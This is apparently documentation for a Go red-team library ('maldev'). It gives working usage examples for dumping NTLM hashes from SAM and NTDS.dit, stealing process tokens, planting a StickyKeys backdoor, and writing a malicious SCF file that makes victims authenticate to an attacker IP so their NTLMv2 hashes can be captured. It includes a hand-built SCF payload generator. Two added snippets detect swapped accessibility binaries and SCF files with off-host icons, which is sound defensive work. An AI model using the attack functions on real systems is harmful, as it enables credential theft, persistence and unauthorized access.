These functions use gosecretsdump, which is fast and dumps NTLM hashes from the SAM or NTDS.dit with many configuration options. The SYSTEM hive is needed in both cases because it holds the boot key used to decrypt the stored hashes.
```go
package main

import (
	"fmt"
	"log"

	"github.com/D3Ext/maldev/redteam"
)

func main() {
	// First way: offline, from exported SAM and SYSTEM hives
	hashes1, err := redteam.DumpSamHashes("C:\\path\\to\\system", "C:\\path\\to\\sam")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(hashes1)

	// Second way: offline, from NTDS.dit and SYSTEM (domain controller)
	hashes2, err := redteam.DumpNtdsHashes("C:\\path\\to\\system", "C:\\path\\to\\ntds")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(hashes2)

	// Third way: automated mode, no hive paths needed
	hashes3, err := redteam.AutoHashDump()
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(hashes3)
}
```
Steal process token (impersonation)
```go
package main

import (
	"log"

	"github.com/D3Ext/maldev/redteam"
)

func main() {
	pid := 1234 // PID of the process whose token will be stolen
	// Returns an error if the current user lacks the privileges to open the process and its token
	token, err := redteam.Impersonate(pid)
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("impersonation token: %v", token)
}
```
StickyKeys backdoor
This function replaces the sethc.exe binary (the StickyKeys helper) with a copy of cmd.exe, so pressing SHIFT five times, including at the logon screen, opens a command prompt running as SYSTEM. Writing over sethc.exe requires administrator rights, since the file is owned by TrustedInstaller. The function also keeps a backup of the original sethc.exe so you can restore it later with RevertStickyKeys().
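The same swap is the thing a defender checks for, so here is the check side, as an added example that is not maldev's own code: it hashes cmd.exe and every accessibility helper in a System32 directory and reports those whose contents are identical to cmd.exe. The list of helper names is this example's assumption (all of them are reachable from the logon screen and are swapped in the same way); the directory is taken from the command line so it can be pointed at a mounted image or a test folder.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"os"
	"path/filepath"
)

// accessibilityBinaries are System32 helpers launchable from the logon screen; each can be
// swapped for cmd.exe exactly like sethc.exe (the list is this example's assumption).
var accessibilityBinaries = []string{
	"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
	"magnify.exe", "displayswitch.exe", "atbroker.exe",
}

// fileSHA256 returns the hex SHA-256 digest of a file's contents.
func fileSHA256(path string) (string, error) {
	f, err := os.Open(path)
	if err != nil {
		return "", err
	}
	defer f.Close()
	h := sha256.New()
	if _, err := io.Copy(h, f); err != nil {
		return "", err
	}
	return hex.EncodeToString(h.Sum(nil)), nil
}

// FindSwappedAccessibilityBinaries hashes cmd.exe in system32Dir and returns the names of the
// accessibility helpers whose contents are byte-identical to it. Helpers that do not exist are
// skipped; a missing or unreadable cmd.exe is an error.
func FindSwappedAccessibilityBinaries(system32Dir string) ([]string, error) {
	cmdHash, err := fileSHA256(filepath.Join(system32Dir, "cmd.exe"))
	if err != nil {
		return nil, fmt.Errorf("hashing cmd.exe: %w", err)
	}
	var swapped []string
	for _, name := range accessibilityBinaries {
		h, err := fileSHA256(filepath.Join(system32Dir, name))
		if os.IsNotExist(err) {
			continue
		}
		if err != nil {
			return nil, fmt.Errorf("hashing %s: %w", name, err)
		}
		if h == cmdHash {
			swapped = append(swapped, name)
		}
	}
	return swapped, nil
}

func main() {
	dir := `C:\Windows\System32`
	if len(os.Args) > 1 {
		dir = os.Args[1]
	}
	swapped, err := FindSwappedAccessibilityBinaries(dir)
	if err != nil {
		fmt.Println("error:", err)
		os.Exit(1)
	}
	if len(swapped) == 0 {
		fmt.Println("no accessibility binary matches cmd.exe")
		return
	}
	for _, name := range swapped {
		fmt.Println("backdoored:", name)
	}
}
```

A byte comparison only catches the file-replacement variant. The other common variant leaves sethc.exe untouched and sets a Debugger value under the Image File Execution Options registry key for sethc.exe, so a full check also inspects that key.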
Malicious SCF file

This function writes a malicious SCF (Shell Command File) to a writable SMB share. The file points its icon at a UNC path on the attacker's host, so as soon as a user browses the share's folder in Explorer (the file itself never has to be opened), Windows tries to fetch the icon and authenticates to the attacker over SMB with the user's credentials. A listener such as Responder captures the NTLMv2 challenge-response, which can be cracked offline or relayed, but cannot be used directly for pass-the-hash.
```go
package main

import (
	"log"

	"github.com/D3Ext/maldev/redteam"
)

func main() {
	path := "C:\\Path\\To\\Smb\\Share\\malicious.scf" // Path (with filename) where the SCF file will be written
	ip := "192.168.1.37"                               // Attacker IP; with Responder listening there you will receive NTLMv2 responses
	err := redteam.CreateScf(path, ip)
	if err != nil {
		log.Fatal(err)
	}
}
```
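To see what the file actually contains, and to have something to scan shares with afterwards, here is the SCF payload built by hand. This is an added example, not maldev's CreateScf implementation: it uses the standard SCF layout (an `IconFile` entry pointing at a UNC path), validates the attacker IP, and includes a small extractor that pulls the remote host out of an SCF's `IconFile` line so a defender can sweep a share for planted files. The share name `share` and icon file name `icon.ico` are arbitrary choices for the example.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"strings"
)

// BuildScf returns the contents of an SCF file whose icon lives on attackerIP. Explorer resolves
// IconFile when it lists the folder, which triggers an SMB authentication to that host.
// The icon name is arbitrary; the host part of the UNC path is what matters.
func BuildScf(attackerIP, shareName string) (string, error) {
	if net.ParseIP(attackerIP) == nil {
		return "", fmt.Errorf("invalid attacker IP %q", attackerIP)
	}
	if shareName == "" || strings.ContainsAny(shareName, `\/`) {
		return "", fmt.Errorf("invalid share name %q", shareName)
	}
	unc := fmt.Sprintf(`\\%s\%s\icon.ico`, attackerIP, shareName)
	// CRLF line endings, as Windows INI-style files expect.
	return "[Shell]\r\n" +
		"Command=2\r\n" +
		"IconFile=" + unc + "\r\n" +
		"[Taskbar]\r\n" +
		"Command=ToggleDesktop\r\n", nil
}

// iconFileRe matches an IconFile entry whose value is a UNC path and captures the host.
var iconFileRe = regexp.MustCompile(`(?im)^\s*IconFile\s*=\s*\\\\([^\\\r\n]+)\\`)

// RemoteIconHost returns the host named in an SCF IconFile UNC path, if any. A local icon path
// (for example C:\Windows\explorer.exe,3) yields ok == false.
func RemoteIconHost(scf string) (host string, ok bool) {
	m := iconFileRe.FindStringSubmatch(scf)
	if m == nil {
		return "", false
	}
	return m[1], true
}

func main() {
	scf, err := BuildScf("192.168.1.37", "share")
	if err != nil {
		panic(err)
	}
	fmt.Print(scf)
	if host, ok := RemoteIconHost(scf); ok {
		fmt.Println("icon is fetched from:", host)
	}
}
```

The capture only works if the victim host can reach the attacker IP over SMB and Explorer is allowed to render icons for the folder; a scan with `RemoteIconHost` over every `.scf` on a share finds files whose icon points off-host, which legitimate SCF files almost never do.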